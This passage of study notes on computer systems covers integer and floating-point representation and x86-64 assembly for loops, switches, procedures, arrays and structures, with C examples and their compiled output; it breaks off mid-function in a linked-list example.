`2147483647`	`-2147483647-1`	>	signed
`2147483647U`	`-2147483647-1`	<	unsigned
`-1`	`-2`	>	signed
`(unsigned)-1`	`-2`	>	unsigned
`2147483647`	`2147483648U`	<	unsigned
`2147483647`	`(int)2147483648U`	>	signed

Expanding, truncating

Sign Extension

Make $k$ copies of sign bit
$\displaystyle X\prime =X_{w-1} ,...,X_{w-1} ,X_{w-1} ,X_{w-2} ,...,X_{0}$

:::warning Converting from smaller to larger integer data type. C automatically performs sign extension. :::

Expanding (e.g., short int to int)

Unsigned: zeros added
Signed: sign extension
Both yield expected result

Truncating (e.g., unsigned to unsigned short)

Unsigned/signed: bits are truncated
Result reinterpreted
Unsigned: mod operation
Signed: similar to mod
For small numbers yields expected behavior

Addition, negation, multiplication, shifting

Unsigned Addition

Standard Addition Function
- Ignore carry output
Implements Modular Arithmetic
- $\displaystyle UAdd_{w}( u,v) =( u+v)\bmod 2^{w}$

Visualizing (Mathematical) Integer Addition

Integer Addition
- 4-bit integers $u,v$
- Compute true sum $Add_{4}( u,v)$
- Values increase linearly with $u$ and $v$
- Forms planar surface

Visualizing Unsigned Addition

Wraps Around
- If true sum $\geqslant 2^{w}$
- At most once

Two's Complement Addition

$TAdd$ and $UAdd$ have Identical Bit-level Behaviour

Signed vs. Unsigned Addition in C:

int s, t, u, v;

s = (int)((unsigned)u + (unsigned)v);
t = u + v;

// will give s == t

TAdd Overflow

Functionality
- True sum requires $w+1$ bits
- Drop off MSB
- Treat remaining bits as two's complement integer

Visualizing Two's Complement Addition

Values
- 4-bit two's comp.
- Range from $-8$ to $+7$
Wraps Around
- If sum $\geqslant 2^{w-1}$
  - Becomes negative
  - At most once
- If sum $< -2^{w-1}$
  - Becomes positive
  - At most once

Multiplication

Goal: Computing Product of $w$-bit numbers $x,y$
- Either signed or unsigned
But, exact results can be bigger than $w$ bits
- Unsigned: up to $2w$ bits
  - Result range: $0\leqslant x\cdot y\leqslant \left( 2^{w} -1\right)^{2} =2^{2w} -2^{w+1} +1$
- Two's complement min (negative): Up to $2w-1$ bits
  - Result range: $x\cdot y\geqslant \left( -2^{w-1}\right) \cdot \left( 2^{w-1} -1\right) =-2^{2w-2} +2^{w-1}$
- Two's complement max (positive): Up to $2w$ bits, but only for $( TMin_{w})^{2}$
  - Result range: $x\cdot y\leqslant \left( -2^{w-1}\right)^{2} =2^{2w-2}$
So, maintaining exact results...
- would need to keep expanding word size with each product computed (exhaust memory faster)
- is done in software, if needed
  - e.g., by "arbitrary precision" arithmetic packages

Unsigned Multiplication in C

Standard Multiplication Function
- Ignore high order $w$ bits
Implements Modular Arithmetic
- $\displaystyle UMult_{w}( u,v) =( u\cdot v)\bmod 2^{w}$

Signed Multiplication in C

Standard Multiplication Function
- Ignore high order $w$ bits
- Some of which are different for signed vs. unsigned multiplication
- Lower bits are the same

Power-of-2 Multiply with Shift

Operation
- u << k gives $u\cdot 2^{k}$ (basically increases each bits weight)
- Both signed and unsigned

Unsigned Power-of-2 Divide with Shift

Quotient of Unsigned by Power of 2
- u >> k gives $\left\lfloor u/2^{k}\right\rfloor $
- Uses logical shift

Signed Power-of-2 Divide with Shift

Quotient of Signed by Power of 2
- Uses arithmetic shift
- Want $\lceil x/2^{k} \rceil $ (Round toward 0)
- Compute as $\left\lfloor \left( x+2^{k} -1\right) /2^{k}\right\rfloor $
  - In C: (x + (1 << k) - 1) >> k
  - Biases dividend toward 0

Case 1: No rounding

Case 2: Rounding

Handy tricks

If you want convert a value $u$ to its negative form by hand or in mind, either unsigned or signed.

Just do: $\sim u+1$

When Should I Use Unsigned ?

:::caution Don't use without understanding implications! :::

Do use when performing modular arithmetic
- Multiplication arithmetic
Do use when using bits to represent sets
- Logical right shift, no sign extension

Representation in memory, pointers, strings

Byte-Oriented Memory Organization

Programs refer to data by address
- Conceptually, envision it as a very large array of bytes
  - In reality, it’s not, but can think of it that way
- An address is like an index into that array
  - and, a pointer variable stores an address
System provides private address spaces to each "process"
- So, a program can clobber its own data, but not that of others

Machine Words

Any given computer has a "Word Size"
- Nominal size of integer-valued data
  - and of addresses
- Until recently, most machines used 32 bits (4 bytes) as word size
  - Limits addresses to 4 GB ($2^{32}$ bytes)
- Increasingly, machines have 64‐bit word size
  - Potentially, could have 18 EB (exabytes) of addressable memory
  - That's $18.4\times 10^{18}$ bytes
- Machines still support multiple data formats
  - Fractions or multiples of word size
  - Always integral number of bytes

Word‐Oriented Memory Organization

Addresses Specify Byte Locations
- Address of first byte in word
- Addresses of successive words differ by 4 (32‐bit) or 8 (64‐bit)

Byte Ordering

Big Endian: Sun, PPC Mac, Internet
- Least significant byte has highest address
Little Endian: x86, ARM processors running Android, iOS, and Windows
- Least significant byte has lowest address

Representation Strings

In C, either little endian or big endian machine, strings in memory represented in the same way, because a string is essentially an array of characters ends with \x00, each character is one byte encoded in ASCII format and single byte (character) do not obey the byte ordering rule.

Floating Point

Background: Fractional binary numbers

Representing

Bits to right of "binary point" represent fractional powers of 2
Represents rational number: $\displaystyle \sum {k=-j}^{i} b{k} \cdot 2^{k}$

Value	Representation
$\displaystyle5\frac{3}{4}$	$101.11_{2}$
$\displaystyle2\frac{7}{8}$	$10.111_{2}$
$\displaystyle1\frac{7}{16}$	$1.0111_{2}$

Observations

Divide by 2 by shifting right (unsigned)
Multiply by 2 by shifting left
Numbers of form $0.111111\dots_{2}$ are just below $1.0$
- $\displaystyle \frac{1}{2} +\frac{1}{4} +\frac{1}{8} +\dots+\frac{1}{2^{i}} +\dots\rightarrow 1.0$
- Use notation $1.0−\epsilon $ ($\epsilon $ depends on how many bits you have to the right of the binary point. If it gets smaller the more, the more of those bits you have there, and it gets closer to $1$)

Limitation 1

Can only exactly represent numbers of the form $\displaystyle\frac{x}{2^{k}}$
- Other rational numbers have repeating bit representations, but cause computer system can only hold a finite number of bits, so $0.1+0.2\neq 0.3$

Value	Representation
$\displaystyle\frac{1}{3}$	$0.0101010101[ 01] \dots_{2}$
$\displaystyle\frac{1}{5}$	$0.001100110011[ 0011] \dots_{2}$
$\displaystyle\frac{1}{10}$	$0.0001100110011[ 0011] \dots_{2}$

Limitation 2

Just one setting of binary point within the $w$ bits
- Limited range of numbers (very small values ? very large ? we have to move the binary point to represent sort of wide as wide a range as possible with as much precision given the number of bits)

Definition: IEEE Floating Point Standard

IEEE Standard 754

Established in 1985 as uniform standard for floating point arithmetic. Before that, many idiosyncratic formats.

Although it provided nice standards for rounding, overflow, underflow... It is hard to make fast in hardware (Numerical analysts predominated over hardware designers in defining standard)

Floating Point Representation

Numerical form: $( -1)^{s} \cdot M\cdot 2^{E}$

Sign bit $s$ determines whether number is negative or positive
Significand $M$ (Mantissa) normally a fractional value in range $[ 1.0,2.0)$
Exponent $E$ weights value by power of two

Encoding

MSB s is sign bit $s$
exp field encodes $E$ (but is not equal to $E$)
frac field encodes $M$ (but is not equal to $M$)

Normalized Values

Condition: $exp\neq 000\dotsc 0$ and $exp\neq 111\dotsc 1$
Exponent coded as a biased value: $E=exp-bias$
- $exp$ is unsigned value of exp field
- $bias=2^{k-1} -1$, where $k$ is number of exponent bits
  - Single precision: $127$ ($exp\in [ 1,254]$, $E\in [ -126,127]$)
  - Double precision: $1023$ ($exp\in [ 1,2046]$, $E\in [ -1022,1023]$)
Significand coded with implied leading $1$: $M=1.xxx\dotsc x_{2}$
- $xxx\dotsc x$ is bits of frac field
- Minimum when $frac=000\dotsc 0\ ( M=1.0)$
- Maximum when $frac=111\dotsc 1\ ( M=2.0-\epsilon )$
- Get extra leading bit for "free"

Normalized Encoding Example

Value: float F = 15213.0;
- $15213_{10} =11101101101101_{2} =1.1101101101101\times 2^{13}$
Significand
- $M=( 1.) 1101101101101_{2}$
- $frac=11011011011010000000000_{2}$
Exponent
- $E=13$
- $bias=127$
- $exp=140=10001100_{2}$

So the result would be:

# manually calculate
((-1)**0)*(1+1/2+1/4+1/16+1/32+1/128+1/256+1/1024+1/2048+1/8192)*(2**13) == 15213.0

# by struct package
import struct

bits = 0b01000110011011011011010000000000
f = struct.unpack("f", struct.pack("I", bits))[0]

print(f)

Denormalized Values

Condition: $exp=000\dotsc 0$
Exponent value: $E=1-bias\ ( instead\ of\ E=0-bias)$
Significand coded with implied leading $0$: $M=0.xxx\dotsc x_{2}$
- $xxx\dotsc x$ is bits of frac field
Cases
- $exp=000\dotsc 0,frac=000\dotsc 0$
  - Represents zero value
  - Note distinct values: $+0$ and $-0$
- $exp=000\dotsc 0,farc\neq 000\dotsc 0$
  - Numbers closet to $0.0$
  - Equispaced

Special Values

Condition: $exp=111\dotsc 1$
Case: $exp=111\dotsc 1,frac=000\dotsc 0$
- Represents value $\infty $
- Operation that overflows
- Both positive and negative
- E.g., $1.0/0.0=-1.0/-0.0=+\infty ,1.0/-0.0=-\infty $
Case: $exp=111\dotsc 1,frac\neq 000\dotsc 0$
- Not-a-Number (NaN)
- Represents case when no numeric value can be determined
- E.g., $\sqrt{-1} ,\infty -\infty ,\infty \cdot 0$

Visualization: Floating Point Encodings

Example and properties

Tiny Floating Point Example

Think about this 8-bit Floating Point Representation below, it obeying the same general form as IEEE Format:

Dynamic Range (Positive Only)

Distribution of Values

Still think about our tiny example, notice how the distribution gets denser toward zero.

Here is a scaled close-up view:

Special Properties of the IEEE Encoding

Floating Point Zero Same as Integer Zero
- All bits = 0
Can (Almost) Use Unsigned Integer Comparison
- Must first compare sign bits
- Must consider $-0=0$
- NaNs problematic
  - What should comparison yield ?
- Otherwise OK
  - Denormalized vs. Normalized
  - Normalized vs. Infinity

Rounding, addition, multiplication

Floating Point Operations: Basic Idea

$x+_{f} y=round( x+y)$

$x\times _{f} y=round( x\times y)$

Basic idea

First compute exact result
Make it fit into desired precision
- Possibly overflow if exponent too large
- Possibly round to fit into frac

Rounding

Rounding Modes (illustrate with $ rounding)

	$1.40	$1.60	$1.50	$2.50	-$1.50
Towards Zero	$1	$1	$1	$2	-$1
Round Down ($-\infty $)	$1	$1	$1	$2	-$2
Round Up ($+\infty $)	$2	$2	$2	$3	-$1
Nearest Even (default)	$1	$2	$2	$2	-$2

:::note[Round to Even] It means, if you have a value that's less than half way then you round down, if more than half way, round up. When you have something that's exactly half way, then what you do is round towards the nearest even number. :::

Closer Look at Round-To-Even

Default Rounding Mode

Hard to get any other kind without dropping into assembly
All others are statistically biased
- Sum of set of positive numbers will consistently be over or underestimated

Applying to Other Decimal Places / Bit Positions

When exactly half way between two possible values
- Round so that least significant digit is even

E.g., round to nearest hundredth:

Value	Rounded
7.8949999	7.89	Less than half way
7.8950001	7.90	Greater than half way
7.8950000	7.90	Half way (round up)
7.8850000	7.88	Half way (rond down)

Rounding Binary Numbers

Binary Fractional Numbers

"Even" when least significant bit is 0
"Half way" when bits to right of rounding position is $100\dotsc _{2}$

E.g., round to nearest $\displaystyle \frac{1}{4}$ (2 bits right of binary point)

Value	Binary	Rounded	Action	Rounded Value
$\displaystyle 2\frac{3}{32}$	$10.00011_{2}$	$10.00_{2}$	Less than half way (round down)	$2$
$\displaystyle 2\frac{3}{16}$	$10.00110_{2}$	$10.01_{2}$	Greater than half way (round up)	$\displaystyle 2\frac{1}{4}$
$\displaystyle 2\frac{7}{8}$	$10.11100_{2}$	$11.00_{2}$	Half way (round up)	$3$
$\displaystyle 2\frac{5}{8}$	$10.10100_{2}$	$10.10_{2}$	Half way (round down)	$\displaystyle 2\frac{1}{2}$

Floating Point Multiplication

$( -1)^{s_{1}} \cdot M_{1} \cdot 2^{E_{1}} \cdot ( -1)^{s_{2}} \cdot M_{2} \cdot 2^{E_{2}} =( -1)^{s} \cdot M \cdot 2^{E}$

Sign $s$ is $s_{1}$^$s_{2}$
Significand $M$ is $M_{1} \cdot M_{2}$
Exponent $E$ is $E_{1}+E_{2}$

Fixing

If $M\geqslant 2$, shift $M$ right, increment $E$
If $E$ out of range, overflow
Round $M$ to fit frac precision

Biggest chore in implementation is multiplying significands

Floating Point Addition

$( -1)^{s_{1}} \cdot M_{1} \cdot 2^{E_{1}} +( -1)^{s_{2}} \cdot M_{2} \cdot 2^{E_{2}} =( -1)^{s} \cdot M \cdot 2^{E}$ (Assume $E_{1}>E_{2}$)

Sign $s$, significand $M$
- Result of signed align & add
Exponent $E$
- $E_{1}$

Fixing

If $M\geqslant 2$, shift $M$ right, increment $E$
If $M<1$, shift $M$ left $k$ positions, decrement $E$ by $k$
Overflow if $E$ out of range
Round $M$ to fit frac precision

Mathematical Properties of Floating Point Add

Compare to those of Abelian Group
- Closed under addition ? (Yes)
  - But may generate infinity or NaN
- Commutative ? (Yes)
- Associative ? (No)
  - Overflow and inexactness of rounding
  - (3.14+1e10)-1e10 = 0, 3.14+(1e10-1e10) = 3.14
- $0$ is additive identity ? (Yes)
- Every element has additive inverse ? (Almost)
  - Except for infinities & NaNs
Monotonicity
- $a\geqslant b\Rightarrow a+c\geqslant b+c$ ? (Almost)
  - Except for infinities & NaNs

Mathematical Properties of Floating Point Mult

Compare to Commutative Ring
- Closed under multiplication ? (Yes)
  - But may generate infinity or NaN
- Multiplication Commutative ? (Yes)
- Multiplication is Associative ? (No)
  - Possibility of overflow, inexactness of rounding
  - (1e20*1e20)*1e-20 = inf, 1e20*(1e20*1e-20) = 1e20
- $1$ is multiplicative identity ? (Yes)
- Multiplication distributes over addition ? (No)
  - Possibility of overflow, inexactness of rounding
  - 1e20*(1e20-1e20) = 0.0, 1e20*1e20-1e20*1e20 = NaN
Monotonicity
- $a\geqslant b\ &\ c\geqslant 0\Rightarrow a\cdot c\geqslant b\cdot c$ ? (Almost)
  - Except for infinities & NaNs

Floating Point in C

Conversions / Casting

:::caution Casting between int, float, and double changes bit representation! :::

double/float to int
- Truncates fractional part
- Like rounding toward zero
- Not defined when out of range or $NaN$: Generally sets to $TMin$
int to double
- Exact conversion, as long as int has $\leqslant 53$ bit word size
int to float
- Will round according to rounding mode

Machine-Level Programming

History of Intel processors and architectures

Nobody (at least me), can keep these long history in mind! So I'll just skipping this part to save life~

C, Assembly, Machine Code

Definitions

Architecture: (also ISA: instruction set architecture) The parts of a processor design that one needs to understand or write assembly/machine code
- Examples: instruction set specification, registers
Microarchitecture: Implementation of the architecture
- Examples: cache sizes and core frequency

Assembly / Machine Code View

Turning C into Object Code

Code in files p1.c p2.c
Compile with command: gcc -Og p1.c p2.c -o p
- Use basic optimizations (-Og) [New to recent versions of GCC]
- Put resulting binary in file p

Assembly Characteristics: Data Types

"Integer" data of 1, 2, 4 or 8 bytes
- Data values
- Address (untyped pointers)
Floating Point data of 4, 8 or 10 bytes
Code: Byte sequences encoding series of instructions
No aggregate types such as arrays or structures
- Just contiguously allocated bytes in memory

Assembly Characteristics: Operations

Perform arithmetic function on register or memory data
Transfer data between memory and register
- Load data from memory into register
- Store register data into memory
Transfer control
- Conditional branches
- Unconditional jumps to/from procedures

Object Code

Assembler
- Translates .s into .o
- Binary encoding of each instruction
- Nearly-complete image of executable code
- Missing linkages between code in different files
Linker
- Resolves references between files
- Combines with static run-time libraries
  - E.g., code for malloc, printf
- Some libraries are dynamically linked
  - Linking occurs when program begins execution

Assembly Basics: Registers, Operands, Move

x86‐64 Integer Registers

Moving Data

movq src, dst
Operand Types
- Immediate: Constant integer data
  - E.g., $0x400, $-533
  - Like C constant, but prefixed with $
  - Encoded with 1, 2, or 4 bytes
- Register: One of 16 integer registers
  - E.g., %rax, %r13
  - But %rsp reserved for special use
  - Others have special uses for particular instructions
- Memory: 8 consecutive bytes of memory at address given by register
  - Simplest example: (%rax)
  - Various other "address modes"

Complete Memory Addressing Modes

D(Rb, Ri, S), Mem[Reg[Rb] + S * Reg[Ri] + D]
- D: Constant "displacement" 1, 2, or 4 bytes
- Rb: Base register: Any of 16 integer registers
- Ri: Index register: Any, except for %rsp
- S: Scale (1, 2, 4, or 8)
Special Cases
- (Rb, Ri): Mem[Reg[Rb] + Reg[Ri]]
- D(Rb, Ri): Mem[Reg[Rb] + Reg[Ri] + D]
- (Rb, Ri, S): Mem[Reg[Rb] + S * Reg[Ri]]

Arithmetic & Logical Operations

Address Computation Instruction

leaq src, dst
- src is address mode expression
- Set dst to address denoted by expression
Uses
- Computing addresses without a memory reference
  - E.g., translation of p = &x[i];
- Computing arithmetic expressions of the form x + k * y
  - k equals to 1, 2, 4, or 8

Here is an example of computing arithmetic expression with leaq:

long m12(long x) {
  return x * 12;
}

Converted to ASM by compiler:

leaq (%rdi, %rdi, 2), %rax # t <- x + x * 2
salq $2, %rax              # return t << 2

A bit more complex one:

long arith(long x, long y, long z) {
  long t1 = x + y;
  long t2 = z + t1;
  long t3 = x + 4;
  long t4 = y * 48;
  long t5 = t3 + t4;
  long rval = t2 * t5;

  return rval;
}

arith:
  leaq (%rdi, %rsi), %rax     # t1
  addq %rdx, %rax             # t2
  leaq (%rsi, %rsi, 2), %rdx
  salq $4, %rdx               # t4
  leaq 4(%rdi, %rdx), %rcx    # t5
  imulq $rcx, %rax            # rval
  ret

Control: Condition Codes

Condition Codes (Implicit Setting)

Think of it as a side effect by arithmetic operations.

leaq won't effect flags.

Condition Codes (Explicit Setting)

Compare Instrucion
- cmpq src2, src1: computing src1 - src2 without setting destination
Test Instruction
- testq src2, src1: computing src1 & src2 without setting destination
- Useful to have one of the operands be a mask

Reading Condition Codes

setX Instructions
- Set low‐order byte of destination (must one of addressable byte registers) to 0 or 1 based on combinations of condition codes
- Does not alter remaining 7 bytes
  - Typically use movzbl (Move with Zero-Extend from Byte to Long) to finish job
    - 32‐bit instructions also set upper 32 bits to 0

:::note Any computation where the result is a 32-bit result, it will zero out the higher 32-bits of the register. And its different for example the byte level operations only affect the bytes, the word operations only affect two bytes. :::

setX	Condition	Description
`sete`	`ZF`	Equal / Zero
`setne`	`~ZF`	Not Equal / Not Zero
`sets`	`SF`	Negative
`setns`	`~SF`	Nonnegative
`setg`	`~(SF ^ OF) & ~ZF`	Greater (Signed)
`setge`	`~(SF ^ OF)`	Greater or Equal (Signed)
`setl`	`(SF ^ OF)`	Less (Signed)
`setle`	`(SF ^ OF) \| ZF`	Less or Equal (Signed)
`seta`	`~CF & ~ZF`	Above (Unsigned)
`setb`	`CF`	Below (Unsigned)

:::note sil, dil, spl, bpl are all 1 byte registers. :::

int gt(long x, long y) {
  return x > y;
}

cmpq   %rsi, %rdi # Compare x:y
setg   %al        # Set %al to 1 when >
movzbl %al, %eax  # Zero rest of %rax
ret

Conditional Branches

Jumping

jX Instructions
- Jump to different part of code depending on condition codes

jX	Condition	Description
`jmp`	`1`	Unconditional
`je`	`ZF`	Equal / Zero
`jne`	`~ZF`	Not Equal / Not Zero
`js`	`SF`	Negative
`jns`	`~SF`	Nonnegative
`jg`	`~(SF ^ OF) & ~ZF`	Greater (Signed)
`jge`	`~(SF ^ OF)`	Greater or Equal (Signed)
`jl`	`SF ^ OF`	Less (Signed)
`jle`	`(SF ^ OF) \| ZF`	Less or Equal (Signed)
`ja`	`~CF & ~ZF`	Above (Unsigned)
`jb`	`CF`	Below (Unsigned)

Using Conditional Moves

Conditional Move Instructions
- Instruction supports: if (Test) Dest <- Src
- Supported in post-1995 x86 processors
- GCC tries to use them (but, only when known to be safe)
  - Branches are very disruptive to instruction flow through pipelines
  - Conditional moves do not require control transfer

Here is a simple example of conditional move:

long absdiff(long x, long y) {
  long result;
  if (x > y)
    result = x - y;
  else
    result = y - x;
  return result;
}

absdiff:
  movq   %rdi, %rax # x
  subq   %rsi, %rax # result = x - y
  movq   %rsi, %rdx
  subq   %rdi, %rdx # eval = y - x
  cmpq   %rsi, %rdi # x:y
  cmovle %rdx, %rax # if <=, result = eval
  ret

Bad Cases for Conditional Move

Expensive Computations: val = Test(x) ? Hard1(x) : Hard2(x);
- Both values get computed
- Only makes sense when computations are very simple
Risky Computations: val = p ? *p : 0;
- Both values get computed
- May have undesirable effects
Computations with side effects: val = x > 0 ? x *= 7 : x += 3;
- Both values get computed
- Must be side-effect free

Loops

:::important Each kind of loop will convert to their goto version and then assembly code. :::

"Do-While" Loop

C Code:

long pcount_do(unsigned long x) {
  long result = 0;
  do {
    result += x & 0x1;
    x >>= 1;
  } while (x);
  return result;
}

Goto Version:

long pcount_goto(unsigned long x) {
  long result = 0;
loop:
  result += x & 0x1;
  x >>= 1;
  if (x) goto loop;
  return result;
}

Assembly Code:

  movl $0, %eax   # result = 0
.L2:              # loop:
  movq %rdi, %rdx
  andl $1, %edx   # t = x & 0x1
  addq %rdx, %rax # result += t
  shrq %rdi       # x >>= 1
  jne  .L2        # if (x) goto loop
  rep; ret

General "Do-While" Translation

do {
  Body
} while (Test);

loop:
  Body
  if (Test)
    goto loop

"While" Loop

General "While" Translation 1 ("Jump‐to-middle" translation, compiled with `-Og`)

while (Test) {
  Body
}

  goto test
loop:
  Body
test:
  if (Test)
    goto loop
done:

General "While" Translation 2 (Compiled with `-O1`)

while (Test) {
  Body
}

To Do-While Version:

  if (!Test)
    goto done;
  do {
    Body
  } while (Test);
done:

Goto Version:

  if (!Test)
    goto done;
loop:
  Body
  if (Test)
    goto loop;
done:

The initial conditional guards entrance to loop.

"For" Loop

"For" Loop "While" Conversion

For Version:

for (Init; Test; Update)
  Body

While Version:

Init;
while (Test) {
  Body
  Update;
}

"For" Loop "Do-While" Conversion

Initial test can be optimized away.

Switch Statements

Switch Statement Example

long switch_eg(long x, long y, long z) {
  long w = 1;
  switch (x) {
    case 1:
      w = y * z;
      break;
    case 2:
      w = y / z;
    /* Fall Through */
    case 3:
      w += z;
      break;
    case 5:
    case 6:
      w -= z;
      break;
    default:
      w = 2;
    }
  return w;
}

Multiple case labels: 5 & 6
Fall through cases: 2
Missing cases: 4

Switch Statement Example in Assembly

switch_eg:
  movq %rdx, %rcx
  cmpq $6, %rdi        # x:6
  ja   .L8             # use default
  jmp  *.L4(, %rdi, 8) # goto *JTab[x]

Note that w not initialized here.

:::tip ja .L8 considering the result is unsigned, so its a smart way to tackle negative number. :::

Jump Table Structure

Jump Table

.section .rodata
  .align 8
.L4:
  .quad .L8 # x = 0
  .quad .L3 # x = 1
  .quad .L5 # x = 2
  .quad .L9 # x = 3
  .quad .L8 # x = 4
  .quad .L7 # x = 5
  .quad .L7 # x = 6

Table Structure
- Each target requires 8 bytes
- Base address at .L4
Jumping
- Direct: jmp .L8
  - Jump target is denoted by label .L8
- Indirect: jmp *.L4(, %rdi, 8)
  - Start of jump table: .L4
  - Must scale by factor of 8 (addresses are 8 bytes)
  - Fetch target from effective address .L4 + %rdi * 8
    - Only for 0 <= x <= 6

Procedures

Stack Structure

x86-64 Stack

Region of memory managed with stack discipline
Grows toward lower addresses
Register %rsp contains lowest stack address
- address of "top" element

Push

pushq src
- Fetch operand at src
- Decrement %rsp by 8
- Write operand at address given by %rsp

Pop

popq dest
- Read value at address given by %rsp
- Increment %rsp by 8
- Store value at dest (must be register)

Calling Conventions

Procedure Control Flow

Use stack to support procedure call and return
Procedure call: call label
- Push return address (address of the next instruction right after call) on stack
- Jump to label
Procedure return: ret
- Pop address from stack
- Jump to address

Managing local data

First 6 arguments are passing by registers: %rdi, %rsi, %rdx, %rcx, %r8, %r9, other more arguments will store in stack
Only allocate stack space when needed
Return value store in %rax

Stack Frames

Contents
- Return information
- Local storage (if needed)
- Temporary space (if needed)
Management
- Space allocated when enter procedure
  - "Set-up" code
  - Includes push by call instruction
- Deallocated when return
  - "Finish" code
  - Includes pop by ret instruction

x86-64 / Linux Stack Frame

Current Stack Frame ("Top" to Bottom)
- Argument build: Parameters for function about to call
Local variables
- If can't keep in registers
Saved register context
Old frame pointer (optional)
Caller Stack Frame
- Return address
- Arguments for this call

:::note As we often see the program often allocates more space on the stack than it really needs to, its because some conventions about trying to keep addresses on aligned. :::

Register Saving Conventions

Caller Saved
- Caller saves temporary values in its frame before the call
Callee Saved
- Callee saves temporary values in its frame before using
- Callee restores them before returning to caller

x86-64 Linux Register Usage 1

%rax
- Return value
- Also caller-saved
- Can be modified by procedure
%rdi, %rsi, %rdx, %rcx, %r8, %r9
- Arguments
- Also caller-saved
- Can be modified by procedure
%r10, %r11
- Caller-saved
- Can be modified by procedure

x86-64 Linux Register Usage 2

%rbx, %r12, %r13, %r14
- Callee-saved
- Callee must save & restore
%rbp
- Callee-saved
- Callee must save & restore
- May be used as frame pointer
- Can mix & match
%rsp
- Special form of callee save
- Restored to original value upon exit from procedure

Recursion Example

long pcount_r(unsigned long x) {
  if (x == 0)
    return 0;
  else:
    return (x & 1) + pcount_r(x >> 1);
}

pcount_r:
  movl  $0, %eax
  testq %rdi, %rdi
  je    .L6
  pushq %rbx
  movq  %rdi, %rbx
  andl  $1, %ebx
  shrq  %rdi
  call  pcount_r
  addq  %rbx, %rax
  popq  %rbx
.L6:
  rep; ret

Handled Without Special Consideration (just using normal calling conventions)
- Stack frames mean that each function call has private storage
  - Saved registers & local variables
  - Saved return pointer
- Register saving conventions prevent one function call from corrupting another's data
  - Unless the C code explicitly does so
- Stack discipline follows call / return pattern
  - If P calls Q, then Q returns before P
  - Last-In, First-Out
Also works for mutual recursion
- P calls Q; Q calls P

Arrays

One-dimensional Array

Array Allocation

T A[L];
- Array of data type T and length L
- Contiguously allocated region of L * sizeof(T) bytes in memory

Array Access

T A[L];
- Array of data type T and length L
- Identifier A can be used as a pointer to array element 0: Type T *

Array Accessing Example

#define ZLEN 5

typedef int zip_dig[ZLEN];

int get_digit(zip_dig z, int digit) {
  return z[digit];
}

movl (%rdi, %rsi, 4), %eax # z[digit]

Register %rdi contains starting address of array
Register %rsi contains array index
Desired digit at %rdi + 4 * %rsi

Array Loop Example

void zincr(zip_dig z) {
  size_t i;
  for (i = 0; i < ZLEN; i++) {
    z[i]++;
  }
}

  movl $0, %eax            # i = 0
  jmp .L3                  # goto middle
.L4:                       # loop:
  addl $1, (%rdi, %rax, 4) # z[i]++
  addq $1, %rax            # i++
.L3:                       # middle
  cmpq $4, %rax            # i:4
  jbe .L4                  # if <=, goto loop
  rep; ret

Multidimensional (Nested) Arrays

T A[R][C]
- 2D array of data type T
- R rows, C columns
- Type T element requires K bytes
Array Size
- R * C * K bytes
Arrangement
- Row-Major Ordering

Nested Array Example

#define ZLEN 5
#define PCOUNT 4

typedef int zip_dig[ZLEN];

zip_dig pgh[PCOUNT] = {
  {1, 5, 2, 0, 6},
  {1, 5, 2, 1, 3},
  {1, 5, 2, 1, 7},
  {1, 5, 2, 2, 1}
}

zip_dig pgh[4] is equivalent to int pgh[4][5].

Nested Array Row Access

Row Vectors
- A[i] is array of C elements
- Each element of type T requires K bytes
- Starting address A + i*(C*K)

Nested Array Row Access Example

int *get_pgh_zip(int index) {
  return pgh[index];
}

leaq (%rdi, %rdi, 4), %rax # 5*index
leaq pgh(, %rax, 4), %rax  # pgh + (20*index)

Row Vector
- pgh[index] is array of 5 int's
- Starting address pgh + 20*index
Machine Code
- Computes and returns address
- Compute as pgh + 4*(index + 4*index)

Nested Array Element Access Example

Array Elements
- A[i][j] is element of type T, which requires K bytes
- Address A + i*(C*K) + j*K = A + (i*C + j)*K

Nested Array Element Access Example

int get_pgh_digit(int index, int dig) {
  return pgh[index][dig];
}

leaq (%rdi, %rdi, 4), %rax # 5*index
addl %rax, %rsi            # 5*index + dig
movl pgh(, %rsi, 4), %eax  # M[pgh + 4*(5*index + dig)]

Array Elements
- pgh[index][dig] is int
- Address: Mem[pgh + 20*index + 4*dig] = Mem[pgh + 4*(5*index + dig)]

Multi-Level Array

zip_dig cmu = {1, 5, 2, 1, 3};
zip_dig mit = {0, 2, 1, 3, 9};
zip_dig ucb = {9, 4, 7, 2, 0};

#define UCOUNT 3

int *univ[UCOUNT] = {mit, cmu, ucb};

Variable univ denotes array of 3 elements
Each element is a pointer (8 bytes)
Each pointer points to array of int's

Element Access in Multi-Level Array

int get_univ_digit(size_t index, size_t digit) {
  return univ[index][digit];
}

salq $2, %rsi              # 4*digit
addq univ(, %rdi, 8), %rsi # p = univ[index] + 4*digit
movl (%rsi), %eax          # return *p
ret

Element access Mem[Mem[univ + 8*index] + 4*digit]
Must do two memory reads
- First get pointer to row array
- Then access element within array

N x N Matrix

Fixed dimensions
- Know value of N at compile time

#define N 16

typedef int fix_matrix[N][N];

/* Get element A[i][j] */
int fix_ele(fix_matrix A, size_t i, size_t j) {
  return A[i][j];
}

Variable dimensions, explicit indexing
- Traditional way to implement dynamic arrays

#define IDX(n, i, j) ((i)*(n)+(j))

/* Get element A[i][j] */
int vec_ele(size_t n, int *A, size_t i, size_t j) {
  return A[IDX(n,i,j)];
}

Variable dimensions, explicit indexing
- Now supported by gcc

/* Get element A[i][j] */
int var_ele(size_t n, int A[n][n], size_t i, size_t j) {
  return A[i][j];
}

N x N Matrix Access

Array Elements
- size_t n;
- int A[n][n];
- Address A + i*(C*K) + j*K
- C = n, K = 4
- Must perform integer multiplication

/* Get element A[i][j] */
int var_ele(size_t n, int A[n][n], size_t i, size_t j) {
  return A[i][j];
}

imulq %rdx, %rdi           # n*i
leaq (%rsi, %rdi, 4), %rax # A + 4*n*i
movl (%rax, %rcx, 4), %eax # A + 4*n*i + 4*j
ret

Understanding Pointers & Array

Cmp: Compiles (Y/N)
Bad: Possible bad pointer reference (Y/N)
Size: Value returned by sizeof

Structures

Allocation

Structure represented as block of memory
- Big enough to hold all of the fields
Fields ordered according to declaration
- Even if another ordering could yield a more compact representation
Compiler determines overall size + positions of fields
- Machine-level program has no understanding of the structures in the source code

Access

Generating Pointer to Structure Member

struct rec {
  int a[4];
  size_t i;
  struct rec *next;
};

int *get_ap(struct rec *r, size_t idx) {
  return &r->a[idx];
}

leaq (%rdi, %rsi, 4), %rax
ret

Offset of each structure member determined at compile time
Compute as r + 4*idx

Following Linked List

struct rec {
  int a[4];
  int i;
  struct rec *next;
};

void set_val(struct rec *r, int val) {
  while (r) {
